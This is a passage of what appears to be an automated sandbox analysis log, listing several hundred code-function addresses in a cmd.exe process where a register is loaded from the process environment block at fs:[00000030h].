Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02AE4 mov eax, dword ptr fs:[00000030h] 5_2_03C02AE4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h] 5_2_03C0D294
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h] 5_2_03C0D294
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0FAB0 mov eax, dword ptr fs:[00000030h] 5_2_03C0FAB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C64257 mov eax, dword ptr fs:[00000030h] 5_2_03C64257
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9EA55 mov eax, dword ptr fs:[00000030h] 5_2_03C9EA55
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF3A1C mov eax, dword ptr fs:[00000030h] 5_2_03BF3A1C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h] 5_2_03C8B260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h] 5_2_03C8B260
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8A62 mov eax, dword ptr fs:[00000030h] 5_2_03CA8A62
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h] 5_2_03BDAA16
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h] 5_2_03BDAA16
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h] 5_2_03BD5210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov ecx, dword ptr fs:[00000030h] 5_2_03BD5210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h] 5_2_03BD5210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h] 5_2_03BD5210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE8A0A mov eax, dword ptr fs:[00000030h] 5_2_03BE8A0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1927A mov eax, dword ptr fs:[00000030h] 5_2_03C1927A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h] 5_2_03C9AA16
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h] 5_2_03C9AA16
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h] 5_2_03C14A2C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h] 5_2_03C14A2C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h] 5_2_03BD9240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h] 5_2_03BD9240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h] 5_2_03BD9240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h] 5_2_03BD9240
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C641E8 mov eax, dword ptr fs:[00000030h] 5_2_03C641E8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC182 mov eax, dword ptr fs:[00000030h] 5_2_03BFC182
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A185 mov eax, dword ptr fs:[00000030h] 5_2_03C0A185
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02990 mov eax, dword ptr fs:[00000030h] 5_2_03C02990
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h] 5_2_03BDB1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h] 5_2_03BDB1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h] 5_2_03BDB1E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h] 5_2_03C061A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h] 5_2_03C061A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C569A6 mov eax, dword ptr fs:[00000030h] 5_2_03C569A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h] 5_2_03C551BE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h] 5_2_03C551BE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h] 5_2_03C551BE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h] 5_2_03C551BE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h] 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h] 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h] 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h] 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov ecx, dword ptr fs:[00000030h] 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h] 5_2_03BD9100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h] 5_2_03BD9100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h] 5_2_03BD9100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h] 5_2_03BDB171
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h] 5_2_03BDB171
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDC962 mov eax, dword ptr fs:[00000030h] 5_2_03BDC962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h] 5_2_03C0513A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h] 5_2_03C0513A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h] 5_2_03BFB944
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h] 5_2_03BFB944
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov ecx, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h] 5_2_03C6B8D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9080 mov eax, dword ptr fs:[00000030h] 5_2_03BD9080
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h] 5_2_03C53884
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h] 5_2_03C53884
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD58EC mov eax, dword ptr fs:[00000030h] 5_2_03BD58EC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h] 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C190AF mov eax, dword ptr fs:[00000030h] 5_2_03C190AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0F0BF mov ecx, dword ptr fs:[00000030h] 5_2_03C0F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h] 5_2_03C0F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h] 5_2_03C0F0BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h] 5_2_03BEB02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h] 5_2_03BEB02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h] 5_2_03BEB02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h] 5_2_03BEB02A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C92073 mov eax, dword ptr fs:[00000030h] 5_2_03C92073
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1074 mov eax, dword ptr fs:[00000030h] 5_2_03CA1074
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h] 5_2_03C57016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h] 5_2_03C57016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h] 5_2_03C57016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h] 5_2_03CA4015
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h] 5_2_03CA4015
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h] 5_2_03C0002D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h] 5_2_03C0002D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h] 5_2_03C0002D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h] 5_2_03C0002D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h] 5_2_03C0002D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h] 5_2_03BF0050
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h] 5_2_03BF0050
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE8794 mov eax, dword ptr fs:[00000030h] 5_2_03BE8794
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C137F5 mov eax, dword ptr fs:[00000030h] 5_2_03C137F5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h] 5_2_03C57794
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h] 5_2_03C57794
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h] 5_2_03C57794
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h] 5_2_03BD4F2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h] 5_2_03BD4F2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8F6A mov eax, dword ptr fs:[00000030h] 5_2_03CA8F6A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFF716 mov eax, dword ptr fs:[00000030h] 5_2_03BFF716
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h] 5_2_03CA070D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h] 5_2_03CA070D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h] 5_2_03C0A70E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h] 5_2_03C0A70E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h] 5_2_03C6FF10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h] 5_2_03C6FF10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEFF60 mov eax, dword ptr fs:[00000030h] 5_2_03BEFF60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0E730 mov eax, dword ptr fs:[00000030h] 5_2_03C0E730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEEF40 mov eax, dword ptr fs:[00000030h] 5_2_03BEEF40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C18EC7 mov eax, dword ptr fs:[00000030h] 5_2_03C18EC7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8FEC0 mov eax, dword ptr fs:[00000030h] 5_2_03C8FEC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C036CC mov eax, dword ptr fs:[00000030h] 5_2_03C036CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8ED6 mov eax, dword ptr fs:[00000030h] 5_2_03CA8ED6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C016E0 mov ecx, dword ptr fs:[00000030h] 5_2_03C016E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6FE87 mov eax, dword ptr fs:[00000030h] 5_2_03C6FE87
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE76E2 mov eax, dword ptr fs:[00000030h] 5_2_03BE76E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C546A7 mov eax, dword ptr fs:[00000030h] 5_2_03C546A7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h] 5_2_03CA0EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h] 5_2_03CA0EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h] 5_2_03CA0EA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h] 5_2_03C9AE44
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h] 5_2_03C9AE44
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDE620 mov eax, dword ptr fs:[00000030h] 5_2_03BDE620
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h] 5_2_03BDC600
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h] 5_2_03BDC600
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h] 5_2_03BDC600
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C08E00 mov eax, dword ptr fs:[00000030h] 5_2_03C08E00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91608 mov eax, dword ptr fs:[00000030h] 5_2_03C91608
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h] 5_2_03BFAE73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h] 5_2_03BFAE73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h] 5_2_03BFAE73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h] 5_2_03BFAE73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h] 5_2_03BFAE73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE766D mov eax, dword ptr fs:[00000030h] 5_2_03BE766D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h] 5_2_03C0A61C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h] 5_2_03C0A61C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8FE3F mov eax, dword ptr fs:[00000030h] 5_2_03C8FE3F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h] 5_2_03BE7E41
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov ecx, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h] 5_2_03C56DC9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h] 5_2_03C9FDE2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h] 5_2_03C9FDE2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h] 5_2_03C9FDE2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h] 5_2_03C9FDE2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h] 5_2_03BD2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h] 5_2_03BD2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h] 5_2_03BD2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h] 5_2_03BD2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h] 5_2_03BD2D8A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C88DF1 mov eax, dword ptr fs:[00000030h] 5_2_03C88DF1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h] 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h] 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h] 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h] 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h] 5_2_03C0FD9B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h] 5_2_03C0FD9B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h] 5_2_03BED5E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h] 5_2_03BED5E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C035A1 mov eax, dword ptr fs:[00000030h] 5_2_03C035A1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h] 5_2_03CA05AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h] 5_2_03CA05AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h] 5_2_03C01DB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h] 5_2_03C01DB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h] 5_2_03C01DB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C13D43 mov eax, dword ptr fs:[00000030h] 5_2_03C13D43
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C53540 mov eax, dword ptr fs:[00000030h] 5_2_03C53540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h] 5_2_03BE3D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDAD30 mov eax, dword ptr fs:[00000030h] 5_2_03BDAD30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h] 5_2_03BFC577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h] 5_2_03BFC577
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF7D50 mov eax, dword ptr fs:[00000030h] 5_2_03BF7D50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9E539 mov eax, dword ptr fs:[00000030h] 5_2_03C9E539
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C5A537 mov eax, dword ptr fs:[00000030h] 5_2_03C5A537
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h] 5_2_03C04D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8D34 mov eax, dword ptr fs:[00000030h] 5_2_03CA8D34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8CD6 mov eax, dword ptr fs:[00000030h] 5_2_03CA8CD6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE849B mov eax, dword ptr fs:[00000030h] 5_2_03BE849B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C914FB mov eax, dword ptr fs:[00000030h] 5_2_03C914FB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h] 5_2_03C56CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A44B mov eax, dword ptr fs:[00000030h] 5_2_03C0A44B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h] 5_2_03C6C450
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h] 5_2_03C6C450
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h] 5_2_03CA740D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h] 5_2_03C91C06
